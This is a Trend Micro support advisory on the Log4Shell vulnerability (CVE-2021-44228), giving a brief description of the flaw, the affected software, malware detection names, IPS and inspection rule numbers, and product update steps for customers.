Sign In with your
Trend Micro Account
需要協助?
需要協助?

若您需要技術支援,請 按此建立案件。

Log4Shell Malware Information

    • 更新於:
    • 10 Mar 2022
    • 產品/版本:
    • 作業系統:
概要

On December 9, 2021, a new critical 0-day vulnerability impacting multiple versions of the popular Apache Log4j 2 logging library was publicly disclosed that, if exploited, could result in Remote Code Execution (RCE) by logging a certain string on affected installations.

This specific vulnerability has been assigned CVE-2021-44228 and is also being commonly referred to as "Log4Shell" in various blogs and reports.

This CVE-2021-44228 is a Java Naming and Directory InterfaceTM (JNDI) injection vulnerability in the affected versions of Log4j listed above. It can be triggered when a system using an affected version of Log4j 2 includes untrusted data in the logged message. If this data includes a crafted malicious payload, a JNDI lookup is made to a malicious server. Depending on the information sent back (response), a malicious Java object may be loaded, which could eventually lead to RCE. Additionally, attackers who can control log messages or their parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

AFFECTED SOFTWARE

  • Apache Struts
  • Apache Solr
  • Apache Druid
  • Apache Flink
  • ElasticSearch
  • Flume
  • Apache Dubbo
  • Logstash
  • Kafka
  • Spring-Boot-starter-log4j2

INFECTION ROUTINE

Log4Shell Threat Advisory - Infection Routine

AVAILABLE SOLUTIONS

File Reputation

Detection/Policy/RulesPattern Branch/VersionRelease Date
Trojan.Linux.MIRAI.SEMR
Backdoor.Linux.MIRAI.SMF
Backdoor.Linux.MIRAI.SME
17.247.0012 Dec 2021
Trojan.SH.CVE20207961.SM17.247.0013 Dec 2021
Backdoor.Linux.MIRAI.SEMR
Trojan.SH.MIRAI.MKF
Coinminer.Linux.KINSING.D
17.248.0413 Dec 2021

Predictive Machine Learning

DetectionPattern Branch/Version
Troj.ELF.TRX.XXELFC1DFF009In-the-cloud
Troj.ELF.TRX.XXELFC1DFF012In-the-cloud

Behavior Monitoring

Pattern Branch/VersionRelease Date
SEN5985S / TMTD 256512 Dec 2021

Web Reputation

URLCategoryBlocking Date
URL Protection (Over 1700 URLs blocked)Malware AccompliceIn-the-cloud

NETWORK PATTERN

Trend Micro Cloud One - Workload Security and Deep Security IPS Rules

  • Rule 1011242 - Log4j Remote Code Execution Vulnerability (CVE-2021-44228)
  • Rule 1005177 - Restrict Java Bytecode File (Jar/Class) Download
  • Rule 1008610 - Block Object-Graph Navigation Language (OGNL) Expressions Initiation In Apache Struts HTTP Request

Trend Micro Cloud One - Workload Security and Deep Security Log Inspection

  • LI Rule 1011241 - Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)

Trend Micro Cloud One - Network Security and TippingPoint DVToolkit CSW file CVE-2021-44228

  • Filter C1000001 : HTTP: JNDI Injection in HTTP Header or URI

Trend Micro Deep Discovery Inspector

  • Proactive Detection:
    • DDI Rule 4280: "HTTP_POSSIBLE_USERAGENT_RCE_EXPLOIT_REQUEST"
  • Protection Solutions:
    • Released in NCIP 1.14747.00:
      • DDI Rule 4641:"CVE-2021-44228 - OGNL EXPLOIT - HTTP(REQUEST)"
      • DDI Rule 4643:"POSSIBLE HTTP BODY OGNL EXPRESSION EXPLOIT - HTTP (REQUEST) - Variant 2" (disabled by default)
    • Released in NCIP 1.14749.00:
      • DDI Rule 4642:"POSSIBLE HTTP HEADER OGNL EXPRESSION EXPLOIT - HTTP(REQUEST)"
詳情
Public

Solution Map - What should customers do?

Trend Micro SolutionsMajor ProductsLatest VersionsVirus PatternAnti-Spam PatternNetwork PatternBehavior MonitoringPredictive Machine LearningWeb Reputation
Endpoint SecurityApexOne2019 (Critical Patch - Server Build 9204 and Agent Build 9179)Update pattern via web consoleNot ApplicableUpdate pattern via web consoleEnable Behavior Monitoring and update pattern via web consoleEnable Predictive Machine LearningEnable Web Reputation Service and update pattern via web console
Worry-Free Business SecurityStandard (10.0)
Advanced (10.0)Update pattern via web console
Hybrid Cloud SecurityDeep Security20.0Update pattern via web consoleNot ApplicableUpdate pattern via web consoleEnable Behavior Monitoring and update pattern via web consoleEnable Predictive Machine LearningEnable Web Reputation Service and update pattern via web console
Cloud One - File Storage Security (SaaS)N/AUpdated AutomaticallyNot ApplicableNot ApplicableNot ApplicableNot Applicable
Cloud One - Application Security (SaaS)Updated automatically
Cloud One - Container Security (SaaS)Not applicable
Email and Gateway SecurityDeep Discovery Email Inspector5.1Update pattern via web consoleUpdate pattern via web consoleUpdate pattern via web consoleNot ApplicableEnable Predictive Machine LearningEnable Web Reputation Service and update pattern via web console
InterScan Messaging Security9.1Not ApplicableNot Applicable
InterScan Web Security / InterScan Web Security Virtual Appliance6.5
ScanMail for Microsoft Exchange14.0
Cloud App Security (SaaS)N/AUpdated AutomaticallyUpdated AutomaticallyEnable Predictive Machine Learning
Hosted Email Security (SaaS)
Email Security (SaaS)
Network SecurityDeep Discovery Inspector5.8Update pattern via web consoleNot ApplicableUpdate pattern via web consoleNot ApplicableNot ApplicableEnable Web Reputation Service and update pattern via web console

To update TrendMicro products, you may refer to the Online Help Center.

Recommendations

Threat Reports

Other Information

Premium
Internal
Partner
評價:
分類:
Remove a Malware / Virus
解決方案ID:
000289946
評定這個解決方案
本文是否幫助解決您的問題?

感謝您的意見!


本意見調查系統為自動運作,將不會回覆如銷售、技術、產品等一般問題.

若您需要協助,請聯繫對應的技術支援窗口. 聯絡我們


To help us improve the quality of this article, please leave your email here so we can clarify further your feedback, if neccessary:
We will not send you spam or share your email address.

*This form is automated system. General questions, technical, sales, and product-related issues submitted through this form will not be answered.